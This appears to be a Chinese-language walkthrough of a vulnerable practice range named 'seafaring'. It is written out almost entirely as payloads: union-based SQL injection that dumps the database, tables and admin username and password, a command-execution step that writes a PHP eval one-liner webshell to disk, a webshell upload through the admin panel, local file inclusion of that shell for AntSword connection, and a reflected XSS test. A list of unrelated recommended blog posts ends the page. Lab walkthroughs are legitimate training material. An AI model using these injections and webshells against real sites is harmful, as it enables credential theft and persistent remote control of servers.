seafaring靶场漏洞测试攻略

打开网页

一.sql注入漏洞

1.输入框测试回显点

-1 union select 1,2,3#

2.查看数据库名

-1 union select 1,2,database()#

3.查看表名

-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test'#

4.查看admin表中列名

-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='test' and table_name='admin'#

5.查看admin的账号和密码

-1 union select 1,2,group_concat(user_id,user_name,user_pass) from admin#

账号为admin,密码为mysql

二:命令执行漏洞

1.页面下方有一个执行框,输入ls查看

2.输入echo '<?php phpinfo();?>' > wff.php 访问wff.php

3.写入一句话木马,访问69.php

echo '<?php @eval($_POST['cmd']);?>' > 69.php

4.蚁剑连接

三:文件上传漏洞

1.使用 账号为admin,密码为mysql 登录网站后台,下方有一个上传文件的地方

2.上传php文件成功,尝试写入一句话木马到wff.php中上传

3.访问上传成功给的路径

4.蚁剑连接

四:文件包含漏洞

1.页面关于存在文件包含

2.通过访问之前写入的wff.php查看,远程文件包含关闭,本地文件可以访问

3.包含之前的69.php一句话木马,访问

4.蚁剑连接

五:反射型xss漏洞

1.登陆界面输入错误会回显在页面上

2.输入<script>alert(1)</script>,页面弹1

相关推荐
掘根21 分钟前
【Qt】常用控件3——显示类控件
开发语言·数据库·qt
码码哈哈爱分享23 分钟前
MariaDB 与 MySQL 区别
数据库·mysql·mariadb
爱敲代码的TOM26 分钟前
深入MySQL底层1-存储引擎与索引
数据库·mysql
GUIQU.27 分钟前
【QT】嵌入式开发:从零开始,让硬件“活”起来的魔法之旅
java·数据库·c++·qt
牛奶咖啡134 小时前
关系数据库MySQL的常用基础命令详解实战
数据库·mysql·本地远程连接到mysql·创建mysql用户和密码·修改mysql用户的密码·设置mysql密码的使用期限·设置和移除mysql用户的权限
ANYOLY5 小时前
Redis 面试宝典
数据库·redis·面试
鲲志说5 小时前
数据洪流时代,如何挑选一款面向未来的时序数据库?IoTDB 的答案
大数据·数据库·apache·时序数据库·iotdb
没有bug.的程序员5 小时前
MVCC(多版本并发控制):InnoDB 高并发的核心技术
java·大数据·数据库·mysql·mvcc
脑花儿7 小时前
ABAP SMW0下载Excel模板并填充&&剪切板方式粘贴
java·前端·数据库
SELSL7 小时前
SQLite3的API调用实战例子
linux·数据库·c++·sqlite3·sqlite实战